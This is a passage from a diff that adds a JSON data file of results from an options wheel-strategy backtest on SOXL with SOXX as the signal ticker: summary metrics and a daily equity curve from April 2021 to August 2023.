b/data/dashboard/wheel/soxl_wheel_aggressive_latest.json @@ -0,0 +1,32522 @@ +{ + "start": "2021-04-16", + "end": "2026-04-24", + "underlying_ticker": "SOXL", + "signal_ticker": "SOXX", + "put_tp_pct": 50.0, + "call_tp_pct": 80.0, + "put_sl_x_pct": null, + "call_sl_x_pct": null, + "metrics": { + "total_return": 82.58262687272196, + "final_value": 18258.262687272196, + "cagr": 12.745528306445731, + "sharpe": 1.1275366823048862, + "max_dd": -16.264107117768305, + "n_trades": 163, + "wins": 138, + "losses": 25, + "win_rate": 84.66257668711657, + "avg_win": 91.35471130883936, + "avg_loss": -372.0593879271597, + "chain_quotes": 0, + "bs_quotes": 584 + }, + "n_trades": 163, + "result_payload": { + "equity": [ + [ + "2021-04-16", + 9998.183037138342 + ], + [ + "2021-04-19", + 9935.62449921027 + ], + [ + "2021-04-20", + 9848.901674092407 + ], + [ + "2021-04-21", + 10047.51117103028 + ], + [ + "2021-04-22", + 9923.764427467617 + ], + [ + "2021-04-23", + 10152.903951357774 + ], + [ + "2021-04-26", + 10251.028645945118 + ], + [ + "2021-04-27", + 10252.23112967591 + ], + [ + "2021-04-28", + 10253.43375446251 + ], + [ + "2021-04-29", + 10254.636520321465 + ], + [ + "2021-04-30", + 10252.84942726932 + ], + [ + "2021-05-03", + 10262.21853137134 + ], + [ + "2021-05-04", + 10211.203725760532 + ], + [ + "2021-05-05", + 10268.273636295988 + ], + [ + "2021-05-06", + 10336.829970325356 + ], + [ + "2021-05-07", + 10335.05251887015 + ], + [ + "2021-05-10", + 10142.911268729375 + ], + [ + "2021-05-11", + 10173.792133994182 + ], + [ + "2021-05-12", + 9836.434608422649 + ], + [ + "2021-05-13", + 9954.384928895988 + ], + [ + "2021-05-14", + 10204.808176259445 + ], + [ + "2021-05-17", + 10212.504165214334 + ], + [ + "2021-05-18", + 10178.333535121954 + ], + [ + "2021-05-19", + 10314.91895295749 + ], + [ + "2021-05-20", + 10431.617292096562 + ], + [ + "2021-05-21", + 10448.741303858327 + ], + [ + "2021-05-24", + 10449.966980018165 + ], + [ + "2021-05-25", + 10451.19279995437 + ], + [ + "2021-05-26", + 10452.418763683803 + ], + [ + "2021-05-27", + 10453.644871223336 + ], + [ + "2021-05-28", + 10454.871122589837 + ], + [ + "2021-06-01", + 10456.097517800177 + ], + [ + "2021-06-02", + 10457.32405687123 + ], + [ + "2021-06-03", + 10458.550739819872 + ], + [ + "2021-06-04", + 10456.787566662979 + ], + [ + "2021-06-07", + 10483.67294389399 + ], + [ + "2021-06-08", + 10502.102306404586 + ], + [ + "2021-06-09", + 10506.398519109547 + ], + [ + "2021-06-10", + 10579.916482189981 + ], + [ + "2021-06-11", + 10581.1575456854 + ], + [ + "2021-06-14", + 10582.398754762176 + ], + [ + "2021-06-15", + 10583.640109437387 + ], + [ + "2021-06-16", + 10584.88160972811 + ], + [ + "2021-06-17", + 10586.12325565143 + ], + [ + "2021-06-18", + 10587.365047224426 + ], + [ + "2021-06-21", + 10588.606984464186 + ], + [ + "2021-06-22", + 10589.849067387797 + ], + [ + "2021-06-23", + 10591.091296012348 + ], + [ + "2021-06-24", + 10592.33367035493 + ], + [ + "2021-06-25", + 10593.576190432637 + ], + [ + "2021-06-28", + 10594.818856262564 + ], + [ + "2021-06-29", + 10596.061667861806 + ], + [ + "2021-06-30", + 10597.304625247465 + ], + [ + "2021-07-01", + 10598.547728436643 + ], + [ + "2021-07-02", + 10599.79097744644 + ], + [ + "2021-07-06", + 10601.034372293963 + ], + [ + "2021-07-07", + 10602.27791299632 + ], + [ + "2021-07-08", + 10603.52159957062 + ], + [ + "2021-07-09", + 10604.765432033973 + ], + [ + "2021-07-12", + 10606.009410403494 + ], + [ + "2021-07-13", + 10607.253534696298 + ], + [ + "2021-07-14", + 10608.4978049295 + ], + [ + "2021-07-15", + 10609.742221120223 + ], + [ + "2021-07-16", + 10607.996783285587 + ], + [ + "2021-07-19", + 10642.082395598105 + ], + [ + "2021-07-20", + 10643.33075138604 + ], + [ + "2021-07-21", + 10644.579253610746 + ], + [ + "2021-07-22", + 10645.827902289398 + ], + [ + "2021-07-23", + 10644.08669743918 + ], + [ + "2021-07-26", + 10676.64695667469 + ], + [ + "2021-07-27", + 10623.053861355274 + ], + [ + "2021-07-28", + 10698.097373662482 + ], + [ + "2021-07-29", + 10699.352300215374 + ], + [ + "2021-07-30", + 10697.61737397581 + ], + [ + "2021-08-02", + 10747.014592823476 + ], + [ + "2021-08-03", + 10748.275257547848 + ], + [ + "2021-08-04", + 10749.536070152873 + ], + [ + "2021-08-05", + 10750.7970306559 + ], + [ + "2021-08-06", + 10749.068139074276 + ], + [ + "2021-08-09", + 10776.191095038703 + ], + [ + "2021-08-10", + 10739.358254175739 + ], + [ + "2021-08-11", + 10750.412150753442 + ], + [ + "2021-08-12", + 10692.943341856233 + ], + [ + "2021-08-13", + 10795.102858734508 + ], + [ + "2021-08-16", + 10796.369164391062 + ], + [ + "2021-08-17", + 10797.635618589973 + ], + [ + "2021-08-18", + 10798.902221348664 + ], + [ + "2021-08-19", + 10800.168972684563 + ], + [ + "2021-08-20", + 10801.435872615099 + ], + [ + "2021-08-23", + 10802.702921157701 + ], + [ + "2021-08-24", + 10803.970118329804 + ], + [ + "2021-08-25", + 10805.23746414884 + ], + [ + "2021-08-26", + 10806.504958632248 + ], + [ + "2021-08-27", + 10807.772601797466 + ], + [ + "2021-08-30", + 10809.040393661935 + ], + [ + "2021-08-31", + 10810.308334243098 + ], + [ + "2021-09-01", + 10811.576423558401 + ], + [ + "2021-09-02", + 10812.84466162529 + ], + [ + "2021-09-03", + 10814.113048461213 + ], + [ + "2021-09-07", + 10815.381584083623 + ], + [ + "2021-09-08", + 10816.650268509973 + ], + [ + "2021-09-09", + 10817.919101757718 + ], + [ + "2021-09-10", + 10819.188083844314 + ], + [ + "2021-09-13", + 10820.457214787222 + ], + [ + "2021-09-14", + 10821.726494603903 + ], + [ + "2021-09-15", + 10822.99592331182 + ], + [ + "2021-09-16", + 10824.26550092844 + ], + [ + "2021-09-17", + 10825.53522747123 + ], + [ + "2021-09-20", + 10826.805102957658 + ], + [ + "2021-09-21", + 10828.075127405196 + ], + [ + "2021-09-22", + 10829.345300831319 + ], + [ + "2021-09-23", + 10830.615623253501 + ], + [ + "2021-09-24", + 10831.886094689222 + ], + [ + "2021-09-27", + 10833.156715155961 + ], + [ + "2021-09-28", + 10834.4274846712 + ], + [ + "2021-09-29", + 10835.698403252421 + ], + [ + "2021-09-30", + 10836.969470917113 + ], + [ + "2021-10-01", + 10835.250687682763 + ], + [ + "2021-10-04", + 10749.306087038922 + ], + [ + "2021-10-05", + 10834.730194091386 + ], + [ + "2021-10-06", + 10866.852680379006 + ], + [ + "2021-10-07", + 10898.691950686904 + ], + [ + "2021-10-08", + 10896.980407728657 + ], + [ + "2021-10-11", + 10908.544239074807 + ], + [ + "2021-10-12", + 10874.92522136316 + ], + [ + "2021-10-13", + 10919.823753340084 + ], + [ + "2021-10-14", + 10975.032487684008 + ], + [ + "2021-10-15", + 10973.329899754268 + ], + [ + "2021-10-18", + 11036.744809382457 + ], + [ + "2021-10-19", + 11038.03946053724 + ], + [ + "2021-10-20", + 11039.334263559413 + ], + [ + "2021-10-21", + 11040.629218466787 + ], + [ + "2021-10-22", + 11038.934325277183 + ], + [ + "2021-10-25", + 11093.173362926766 + ], + [ + "2021-10-26", + 11094.474633360447 + ], + [ + "2021-10-27", + 11095.776056437982 + ], + [ + "2021-10-28", + 11097.077632177277 + ], + [ + "2021-10-29", + 11095.38936059624 + ], + [ + "2021-11-01", + 11156.836691980876 + ], + [ + "2021-11-02", + 11158.14543035949 + ], + [ + "2021-11-03", + 11159.454322257976 + ], + [ + "2021-11-04", + 11160.763367694342 + ], + [ + "2021-11-05", + 11162.0725666866 + ], + [ + "2021-11-08", + 11163.381919252763 + ], + [ + "2021-11-09", + 11164.691425410843 + ], + [ + "2021-11-10", + 11166.00108517886 + ], + [ + "2021-11-11", + 11167.31089857483 + ], + [ + "2021-11-12", + 11168.620865616776 + ], + [ + "2021-11-15", + 11169.930986322723 + ], + [ + "2021-11-16", + 11171.241260710693 + ], + [ + "2021-11-17", + 11172.551688798714 + ], + [ + "2021-11-18", + 11173.862270604817 + ], + [ + "2021-11-19", + 11175.173006147033 + ], + [ + "2021-11-22", + 11176.483895443396 + ], + [ + "2021-11-23", + 11177.794938511943 + ], + [ + "2021-11-24", + 11179.10613537071 + ], + [ + "2021-11-26", + 11177.427486037739 + ], + [ + "2021-11-29", + 11295.640571064025 + ], + [ + "2021-11-30", + 11296.96559165315 + ], + [ + "2021-12-01", + 11298.290767672112 + ], + [ + "2021-12-02", + 11299.61609913914 + ], + [ + "2021-12-03", + 11297.951586072471 + ], + [ + "2021-12-06", + 11353.95129959558 + ], + [ + "2021-12-07", + 11441.132565178721 + ], + [ + "2021-12-08", + 11442.47465251909 + ], + [ + "2021-12-09", + 11443.816897291286 + ], + [ + "2021-12-10", + 11442.16929951378 + ], + [ + "2021-12-13", + 11304.417393736607 + ], + [ + "2021-12-14", + 11295.102432959824 + ], + [ + "2021-12-15", + 11577.302965156416 + ], + [ + "2021-12-16", + 11578.661025790416 + ], + [ + "2021-12-17", + 11577.02924572997 + ], + [ + "2021-12-20", + 11618.699883975823 + ], + [ + "2021-12-21", + 11768.180633911157 + ], + [ + "2021-12-22", + 11769.56108520459 + ], + [ + "2021-12-23", + 11770.941698430086 + ], + [ + "2021-12-27", + 11772.32247360664 + ], + [ + "2021-12-28", + 11773.70341075325 + ], + [ + "2021-12-29", + 11775.084509888917 + ], + [ + "2021-12-30", + 11776.465771032641 + ], + [ + "2021-12-31", + 11774.857194203425 + ], + [ + "2022-01-03", + 11952.357807326473 + ], + [ + "2022-01-04", + 11953.75986328635 + ], + [ + "2022-01-05", + 11955.1620837126 + ], + [ + "2022-01-06", + 11956.564468624512 + ], + [ + "2022-01-07", + 11954.977018041383 + ], + [ + "2022-01-10", + 12045.611221699504 + ], + [ + "2022-01-11", + 12134.997950618852 + ], + [ + "2022-01-12", + 12136.421430945833 + ], + [ + "2022-01-13", + 12137.845078252343 + ], + [ + "2022-01-14", + 12136.27889255797 + ], + [ + "2022-01-18", + 11793.475736209706 + ], + [ + "2022-01-19", + 11364.938799584153 + ], + [ + "2022-01-20", + 10901.551670126964 + ], + [ + "2022-01-21", + 10678.264691694083 + ], + [ + "2022-01-24", + 10824.64339487432 + ], + [ + "2022-01-25", + 10533.852042746365 + ], + [ + "2022-01-26", + 10721.92496715486 + ], + [ + "2022-01-27", + 10163.732952936614 + ], + [ + "2022-01-28", + 10360.459660380657 + ], + [ + "2022-01-31", + 10597.367837626483 + ], + [ + "2022-02-01", + 10640.637821365708 + ], + [ + "2022-02-02", + 10670.970835606493 + ], + [ + "2022-02-03", + 10649.540533635038 + ], + [ + "2022-02-04", + 10674.143228719753 + ], + [ + "2022-02-07", + 10760.518164646075 + ], + [ + "2022-02-08", + 10857.648410861626 + ], + [ + "2022-02-09", + 10858.92205334373 + ], + [ + "2022-02-10", + 10860.195845228825 + ], + [ + "2022-02-11", + 10858.479786534439 + ], + [ + "2022-02-14", + 10949.482927314588 + ], + [ + "2022-02-15", + 11081.996996721866 + ], + [ + "2022-02-16", + 11083.296956126283 + ], + [ + "2022-02-17", + 11084.597068020767 + ], + [ + "2022-02-18", + 11082.907332423205 + ], + [ + "2022-02-22", + 11167.857748212453 + ], + [ + "2022-02-23", + 11090.269891341895 + ], + [ + "2022-02-24", + 11294.89527834397 + ], + [ + "2022-02-25", + 11293.230211507493 + ], + [ + "2022-02-28", + 11352.734045846724 + ], + [ + "2022-03-01", + 11181.02958339071 + ], + [ + "2022-03-02", + 11400.911317328884 + ], + [ + "2022-03-03", + 11322.759534483212 + ], + [ + "2022-03-04", + 11109.992495019296 + ], + [ + "2022-03-07", + 10821.610791153078 + ], + [ + "2022-03-08", + 10975.871613484655 + ], + [ + "2022-03-09", + 11342.658103695876 + ], + [ + "2022-03-10", + 11132.036484944108 + ], + [ + "2022-03-11", + 10930.070483438476 + ], + [ + "2022-03-14", + 10837.824974207704 + ], + [ + "2022-03-15", + 11060.748432098791 + ], + [ + "2022-03-16", + 11215.067907023482 + ], + [ + "2022-03-17", + 11235.82324392524 + ], + [ + "2022-03-18", + 11237.309218821887 + ], + [ + "2022-03-21", + 11310.279218810247 + ], + [ + "2022-03-22", + 11357.70248412915 + ], + [ + "2022-03-23", + 11359.034784811165 + ], + [ + "2022-03-24", + 11360.367241776998 + ], + [ + "2022-03-25", + 11358.70985504498 + ], + [ + "2022-03-28", + 11465.10289910468 + ], + [ + "2022-03-29", + 11559.710853847537 + ], + [ + "2022-03-30", + 11561.066850861545 + ], + [ + "2022-03-31", + 11562.42300693904 + ], + [ + "2022-04-01", + 11560.789322098677 + ], + [ + "2022-04-04", + 11690.164859912587 + ], + [ + "2022-04-05", + 11691.536159665991 + ], + [ + "2022-04-06", + 11692.90762027795 + ], + [ + "2022-04-07", + 11694.279241767332 + ], + [ + "2022-04-08", + 11692.661024153009 + ], + [ + "2022-04-11", + 11678.390413746401 + ], + [ + "2022-04-12", + 11698.772029486207 + ], + [ + "2022-04-13", + 11799.472731454256 + ], + [ + "2022-04-14", + 11800.856853426943 + ], + [ + "2022-04-18", + 11802.24113776228 + ], + [ + "2022-04-19", + 11803.625584479309 + ], + [ + "2022-04-20", + 11805.01019359708 + ], + [ + "2022-04-21", + 11806.394965134643 + ], + [ + "2022-04-22", + 11804.78989911105 + ], + [ + "2022-04-25", + 11858.138071100982 + ], + [ + "2022-04-26", + 11859.529074735885 + ], + [ + "2022-04-27", + 11860.92024154068 + ], + [ + "2022-04-28", + 11862.311571534507 + ], + [ + "2022-04-29", + 11860.713064736508 + ], + [ + "2022-05-02", + 11939.923451811424 + ], + [ + "2022-05-03", + 11941.32404917522 + ], + [ + "2022-05-04", + 11942.72481083429 + ], + [ + "2022-05-05", + 11944.125736807904 + ], + [ + "2022-05-06", + 11942.536827115338 + ], + [ + "2022-05-09", + 11801.783436092694 + ], + [ + "2022-05-10", + 11904.043749795768 + ], + [ + "2022-05-11", + 11789.79648189856 + ], + [ + "2022-05-12", + 11828.53297012857 + ], + [ + "2022-05-13", + 12077.000206171535 + ], + [ + "2022-05-16", + 12086.413744414538 + ], + [ + "2022-05-17", + 12189.830355339785 + ], + [ + "2022-05-18", + 12191.26026771148 + ], + [ + "2022-05-19", + 12192.690347817204 + ], + [ + "2022-05-20", + 12191.130595676637 + ], + [ + "2022-05-23", + 12250.622081956608 + ], + [ + "2022-05-24", + 12217.45153441638 + ], + [ + "2022-05-25", + 12280.883695898923 + ], + [ + "2022-05-26", + 12282.324289165621 + ], + [ + "2022-05-27", + 12280.77505141926 + ], + [ + "2022-05-31", + 12350.823564034443 + ], + [ + "2022-06-01", + 12332.712716946107 + ], + [ + "2022-06-02", + 12438.180894775714 + ], + [ + "2022-06-03", + 12436.649939588016 + ], + [ + "2022-06-06", + 12487.444949239942 + ], + [ + "2022-06-07", + 12535.12016842106 + ], + [ + "2022-06-08", + 12536.590584570176 + ], + [ + "2022-06-09", + 12538.061173204569 + ], + [ + "2022-06-10", + 12536.54193434447 + ], + [ + "2022-06-13", + 12406.32270936519 + ], + [ + "2022-06-14", + 12434.337706322329 + ], + [ + "2022-06-15", + 12514.708379647285 + ], + [ + "2022-06-16", + 12255.250270956212 + ], + [ + "2022-06-17", + 12266.244640764593 + ], + [ + "2022-06-21", + 12350.264119344782 + ], + [ + "2022-06-22", + 12348.96233223068 + ], + [ + "2022-06-23", + 12358.315419052376 + ], + [ + "2022-06-24", + 12399.626668746765 + ], + [ + "2022-06-27", + 12437.76683696525 + ], + [ + "2022-06-28", + 12406.156301770252 + ], + [ + "2022-06-29", + 12355.853780119382 + ], + [ + "2022-06-30", + 12329.01411621691 + ], + [ + "2022-07-01", + 12184.224475399293 + ], + [ + "2022-07-05", + 12229.010243695015 + ], + [ + "2022-07-06", + 12251.274565444806 + ], + [ + "2022-07-07", + 12289.75428869275 + ], + [ + "2022-07-08", + 12289.787513983008 + ], + [ + "2022-07-11", + 12278.274400370472 + ], + [ + "2022-07-12", + 12295.695078945088 + ], + [ + "2022-07-13", + 12330.107519205245 + ], + [ + "2022-07-14", + 12363.179051016465 + ], + [ + "2022-07-15", + 12361.63929783395 + ], + [ + "2022-07-18", + 12395.13405578293 + ], + [ + "2022-07-19", + 12429.538260416699 + ], + [ + "2022-07-20", + 12430.996291415893 + ], + [ + "2022-07-21", + 12432.454493447538 + ], + [ + "2022-07-22", + 12430.922866531697 + ], + [ + "2022-07-25", + 12454.73455148992 + ], + [ + "2022-07-26", + 12430.348191195615 + ], + [ + "2022-07-27", + 12501.755712905262 + ], + [ + "2022-07-28", + 12503.222215279837 + ], + [ + "2022-07-29", + 12501.698889680585 + ], + [ + "2022-08-01", + 12544.023823539872 + ], + [ + "2022-08-02", + 12545.495284120801 + ], + [ + "2022-08-03", + 12546.96691730952 + ], + [ + "2022-08-04", + 12548.438723126279 + ], + [ + "2022-08-05", + 12549.910701591325 + ], + [ + "2022-08-08", + 12551.382852724912 + ], + [ + "2022-08-09", + 12552.855176547295 + ], + [ + "2022-08-10", + 12554.32767307873 + ], + [ + "2022-08-11", + 12555.800342339477 + ], + [ + "2022-08-12", + 12554.283184349797 + ], + [ + "2022-08-15", + 12595.071898184686 + ], + [ + "2022-08-16", + 12596.375706305984 + ], + [ + "2022-08-17", + 12538.91080042995 + ], + [ + "2022-08-18", + 12622.296681144231 + ], + [ + "2022-08-19", + 12620.78732342205 + ], + [ + "2022-08-22", + 12550.199868390873 + ], + [ + "2022-08-23", + 12582.197777552537 + ], + [ + "2022-08-24", + 12609.134064906406 + ], + [ + "2022-08-25", + 12693.934522407544 + ], + [ + "2022-08-26", + 12692.433568070193 + ], + [ + "2022-08-29", + 12686.179455163849 + ], + [ + "2022-08-30", + 12670.045544750099 + ], + [ + "2022-08-31", + 12659.31036731033 + ], + [ + "2022-09-01", + 12603.197276405752 + ], + [ + "2022-09-02", + 12568.507037654681 + ], + [ + "2022-09-06", + 12579.374972437741 + ], + [ + "2022-09-07", + 12626.93954283776 + ], + [ + "2022-09-08", + 12671.504626820704 + ], + [ + "2022-09-09", + 12684.527714201504 + ], + [ + "2022-09-12", + 12715.902638552112 + ], + [ + "2022-09-13", + 12574.885599720437 + ], + [ + "2022-09-14", + 12612.70365886769 + ], + [ + "2022-09-15", + 12572.26043296324 + ], + [ + "2022-09-16", + 12586.112188814372 + ], + [ + "2022-09-19", + 12619.66674500457 + ], + [ + "2022-09-20", + 12604.106548730399 + ], + [ + "2022-09-21", + 12590.977747956616 + ], + [ + "2022-09-22", + 12505.546164477471 + ], + [ + "2022-09-23", + 12457.10095431976 + ], + [ + "2022-09-26", + 12450.961996707285 + ], + [ + "2022-09-27", + 12474.364402269433 + ], + [ + "2022-09-28", + 12502.381255216917 + ], + [ + "2022-09-29", + 12441.788054928375 + ], + [ + "2022-09-30", + 12398.224788749798 + ], + [ + "2022-10-03", + 12441.084950221513 + ], + [ + "2022-10-04", + 12459.805709325808 + ], + [ + "2022-10-05", + 12463.226745589156 + ], + [ + "2022-10-06", + 12464.894707234462 + ], + [ + "2022-10-07", + 12463.349989949982 + ], + [ + "2022-10-10", + 12438.856776564702 + ], + [ + "2022-10-11", + 12398.666323201174 + ], + [ + "2022-10-12", + 12382.464101388572 + ], + [ + "2022-10-13", + 12445.504534774678 + ], + [ + "2022-10-14", + 12343.587811781577 + ], + [ + "2022-10-17", + 12374.730534914124 + ], + [ + "2022-10-18", + 12384.059141293816 + ], + [ + "2022-10-19", + 12396.350875687394 + ], + [ + "2022-10-20", + 12406.761737802142 + ], + [ + "2022-10-21", + 12408.850543782937 + ], + [ + "2022-10-24", + 12429.446545720535 + ], + [ + "2022-10-25", + 12445.181719156766 + ], + [ + "2022-10-26", + 12446.641585191768 + ], + [ + "2022-10-27", + 12448.101622474478 + ], + [ + "2022-10-28", + 12446.571831024983 + ], + [ + "2022-10-31", + 12444.593209819306 + ], + [ + "2022-11-01", + 12465.024469636943 + ], + [ + "2022-11-02", + 12424.981667225109 + ], + [ + "2022-11-03", + 12403.056316825658 + ], + [ + "2022-11-04", + 12501.65185898719 + ], + [ + "2022-11-07", + 12530.77076451499 + ], + [ + "2022-11-08", + 12532.240670462876 + ], + [ + "2022-11-09", + 12533.710748836189 + ], + [ + "2022-11-10", + 12535.180999655155 + ], + [ + "2022-11-11", + 12536.651422940002 + ], + [ + "2022-11-14", + 12538.122018710961 + ], + [ + "2022-11-15", + 12539.592786988265 + ], + [ + "2022-11-16", + 12541.06372779215 + ], + [ + "2022-11-17", + 12542.534841142855 + ], + [ + "2022-11-18", + 12541.016127060619 + ], + [ + "2022-11-21", + 12546.457716314619 + ], + [ + "2022-11-22", + 12590.224883131163 + ], + [ + "2022-11-23", + 12591.701763267965 + ], + [ + "2022-11-25", + 12590.188816648293 + ], + [ + "2022-11-28", + 12578.335776673592 + ], + [ + "2022-11-29", + 12587.027508685811 + ], + [ + "2022-11-30", + 12663.47572328263 + ], + [ + "2022-12-01", + 12664.961196015023 + ], + [ + "2022-12-02", + 12663.456842998885 + ], + [ + "2022-12-05", + 12680.703238076418 + ], + [ + "2022-12-06", + 12652.095922825165 + ], + [ + "2022-12-07", + 12666.329983392881 + ], + [ + "2022-12-08", + 12728.490485290271 + ], + [ + "2022-12-09", + 12726.993584495702 + ], + [ + "2022-12-12", + 12761.081065172393 + ], + [ + "2022-12-13", + 12762.577987373881 + ], + [ + "2022-12-14", + 12764.075085169901 + ], + [ + "2022-12-15", + 12765.572358581054 + ], + [ + "2022-12-16", + 12764.079807627937 + ], + [ + "2022-12-19", + 12767.08576050318 + ], + [ + "2022-12-20", + 12765.698747735014 + ], + [ + "2022-12-21", + 12797.003951829025 + ], + [ + "2022-12-22", + 12798.50508791853 + ], + [ + "2022-12-23", + 12797.01640009687 + ], + [ + "2022-12-27", + 12802.319144421097 + ], + [ + "2022-12-28", + 12789.617808282093 + ], + [ + "2022-12-29", + 12834.53191414497 + ], + [ + "2022-12-30", + 12836.037452403827 + ], + [ + "2023-01-03", + 12837.543167267911 + ], + [ + "2023-01-04", + 12839.049058757942 + ], + [ + "2023-01-05", + 12840.555126894638 + ], + [ + "2023-01-06", + 12839.07137169872 + ], + [ + "2023-01-09", + 12868.928515131816 + ], + [ + "2023-01-10", + 12870.43808823971 + ], + [ + "2023-01-11", + 12871.947838426138 + ], + [ + "2023-01-12", + 12873.45776571187 + ], + [ + "2023-01-13", + 12871.977870117678 + ], + [ + "2023-01-17", + 12903.428780873017 + ], + [ + "2023-01-18", + 12904.942400990212 + ], + [ + "2023-01-19", + 12906.456198660668 + ], + [ + "2023-01-20", + 12907.970173905213 + ], + [ + "2023-01-23", + 12909.484326744676 + ], + [ + "2023-01-24", + 12910.99865719989 + ], + [ + "2023-01-25", + 12912.513165291692 + ], + [ + "2023-01-26", + 12914.027851040917 + ], + [ + "2023-01-27", + 12915.542714468405 + ], + [ + "2023-01-30", + 12917.057755595 + ], + [ + "2023-01-31", + 12918.572974441546 + ], + [ + "2023-02-01", + 12920.088371028889 + ], + [ + "2023-02-02", + 12921.60394537788 + ], + [ + "2023-02-03", + 12923.11969750937 + ], + [ + "2023-02-06", + 12924.635627444215 + ], + [ + "2023-02-07", + 12926.151735203272 + ], + [ + "2023-02-08", + 12927.668020807398 + ], + [ + "2023-02-09", + 12929.184484277457 + ], + [ + "2023-02-10", + 12927.711125634314 + ], + [ + "2023-02-13", + 12965.332452682396 + ], + [ + "2023-02-14", + 12966.853334330193 + ], + [ + "2023-02-15", + 12968.374394383058 + ], + [ + "2023-02-16", + 12969.895632861915 + ], + [ + "2023-02-17", + 12968.427049787695 + ], + [ + "2023-02-21", + 12942.530711457388 + ], + [ + "2023-02-22", + 12942.38901452909 + ], + [ + "2023-02-23", + 13016.440750529579 + ], + [ + "2023-02-24", + 13014.977627370521 + ], + [ + "2023-02-27", + 13042.771757255681 + ], + [ + "2023-02-28", + 13054.261206733889 + ], + [ + "2023-03-01", + 13055.792520054803 + ], + [ + "2023-03-02", + 13057.324013004458 + ], + [ + "2023-03-03", + 13058.855685603923 + ], + [ + "2023-03-06", + 13060.387537874272 + ], + [ + "2023-03-07", + 13061.919569836582 + ], + [ + "2023-03-08", + 13063.45178151193 + ], + [ + "2023-03-09", + 13064.984172921399 + ], + [ + "2023-03-10", + 13066.516744086071 + ], + [ + "2023-03-13", + 13068.049495027033 + ], + [ + "2023-03-14", + 13069.582425765373 + ], + [ + "2023-03-15", + 13071.11553632218 + ], + [ + "2023-03-16", + 13072.64882671855 + ], + [ + "2023-03-17", + 13074.182296975578 + ], + [ + "2023-03-20", + 13075.715947114362 + ], + [ + "2023-03-21", + 13077.249777156003 + ], + [ + "2023-03-22", + 13078.783787121603 + ], + [ + "2023-03-23", + 13080.317977032271 + ], + [ + "2023-03-24", + 13081.852346909112 + ], + [ + "2023-03-27", + 13083.386896773238 + ], + [ + "2023-03-28", + 13084.921626645762 + ], + [ + "2023-03-29", + 13086.456536547801 + ], + [ + "2023-03-30", + 13087.99162650047 + ], + [ + "2023-03-31", + 13089.526896524892 + ], + [ + "2023-04-03", + 13091.062346642191 + ], + [ + "2023-04-04", + 13092.59797687349 + ], + [ + "2023-04-05", + 13094.13378723992 + ], + [ + "2023-04-06", + 13095.669777762609 + ], + [ + "2023-04-10", + 13097.20594846269 + ], + [ + "2023-04-11", + 13098.7422993613 + ], + [ + "2023-04-12", + 13100.278830479576 + ], + [ + "2023-04-13", + 13101.815541838658 + ], + [ + "2023-04-14", + 13103.35243345969 + ], + [ + "2023-04-17", + 13104.889505363815 + ], + [ + "2023-04-18", + 13106.426757572184 + ], + [ + "2023-04-19", + 13107.964190105946 + ], + [ + "2023-04-20", + 13109.501802986255 + ], + [ + "2023-04-21", + 13111.039596234265 + ], + [ + "2023-04-24", + 13112.577569871133 + ], + [ + "2023-04-25", + 13114.115723918021 + ], + [ + "2023-04-26", + 13115.654058396092 + ], + [ + "2023-04-27", + 13117.19257332651 + ], + [ + "2023-04-28", + 13118.731268730444 + ], + [ + "2023-05-01", + 13120.270144629061 + ], + [ + "2023-05-02", + 13121.809201043538 + ], + [ + "2023-05-03", + 13123.348437995048 + ], + [ + "2023-05-04", + 13124.887855504769 + ], + [ + "2023-05-05", + 13126.42745359388 + ], + [ + "2023-05-08", + 13127.967232283565 + ], + [ + "2023-05-09", + 13129.507191595008 + ], + [ + "2023-05-10", + 13131.047331549398 + ], + [ + "2023-05-11", + 13132.587652167926 + ], + [ + "2023-05-12", + 13134.128153471782 + ], + [ + "2023-05-15", + 13135.668835482162 + ], + [ + "2023-05-16", + 13137.209698220264 + ], + [ + "2023-05-17", + 13138.750741707287 + ], + [ + "2023-05-18", + 13140.291965964434 + ], + [ + "2023-05-19", + 13141.83337101291 + ], + [ + "2023-05-22", + 13143.374956873924 + ], + [ + "2023-05-23", + 13144.916723568684 + ], + [ + "2023-05-24", + 13146.458671118402 + ], + [ + "2023-05-25", + 13148.000799544296 + ], + [ + "2023-05-26", + 13149.543108867581 + ], + [ + "2023-05-30", + 13151.085599109478 + ], + [ + "2023-05-31", + 13152.628270291209 + ], + [ + "2023-06-01", + 13154.171122433998 + ], + [ + "2023-06-02", + 13155.714155559073 + ], + [ + "2023-06-05", + 13157.257369687664 + ], + [ + "2023-06-06", + 13158.800764841004 + ], + [ + "2023-06-07", + 13160.344341040327 + ], + [ + "2023-06-08", + 13161.888098306872 + ], + [ + "2023-06-09", + 13163.432036661878 + ], + [ + "2023-06-12", + 13164.976156126586 + ], + [ + "2023-06-13", + 13166.52045672224 + ], + [ + "2023-06-14", + 13168.064938470092 + ], + [ + "2023-06-15", + 13169.609601391388 + ], + [ + "2023-06-16", + 13171.154445507382 + ], + [ + "2023-06-20", + 13172.699470839327 + ], + [ + "2023-06-21", + 13174.244677408482 + ], + [ + "2023-06-22", + 13175.790065236106 + ], + [ + "2023-06-23", + 13174.345634343461 + ], + [ + "2023-06-26", + 13231.20839520249 + ], + [ + "2023-06-27", + 13232.760465085765 + ], + [ + "2023-06-28", + 13234.3127170326 + ], + [ + "2023-06-29", + 13235.865151064356 + ], + [ + "2023-06-30", + 13237.417767202387 + ], + [ + "2023-07-03", + 13238.970565468058 + ], + [ + "2023-07-05", + 13240.523545882732 + ], + [ + "2023-07-06", + 13242.076708467777 + ], + [ + "2023-07-07", + 13243.630053244562 + ], + [ + "2023-07-10", + 13245.183580234458 + ], + [ + "2023-07-11", + 13246.737289458839 + ], + [ + "2023-07-12", + 13248.291180939083 + ], + [ + "2023-07-13", + 13249.845254696567 + ], + [ + "2023-07-14", + 13251.399510752675 + ], + [ + "2023-07-17", + 13252.95394912879 + ], + [ + "2023-07-18", + 13254.5085698463 + ], + [ + "2023-07-19", + 13256.063372926594 + ], + [ + "2023-07-20", + 13257.618358391062 + ], + [ + "2023-07-21", + 13256.183526261102 + ], + [ + "2023-07-24", + 13286.11012001584 + ], + [ + "2023-07-25", + 13311.615348862682 + ], + [ + "2023-07-26", + 13313.176850780239 + ], + [ + "2023-07-27", + 13314.738535867771 + ], + [ + "2023-07-28", + 13313.310404146763 + ], + [ + "2023-07-31", + 13346.786540329535 + ], + [ + "2023-08-01", + 13348.35216795847 + ], + [ + "2023-08-02", + 13349.917979241342 + ], + [ + "2023-08-03", + 13351.483974199691 + ], + [ + "2023-08-04", + 13350.060152855067 + ], + [ + "2023-08-07", + 13392.971073526363 + ], + [ + "2023-08-08", + 13394.542118772566 + ], + [ + "2023-08-09", + 13396.11334830821 + ], + [ + "2023-08-10", + 13397.684762154915 + ], + [ + "2023-08-11", + 13396.266360334299 + ], 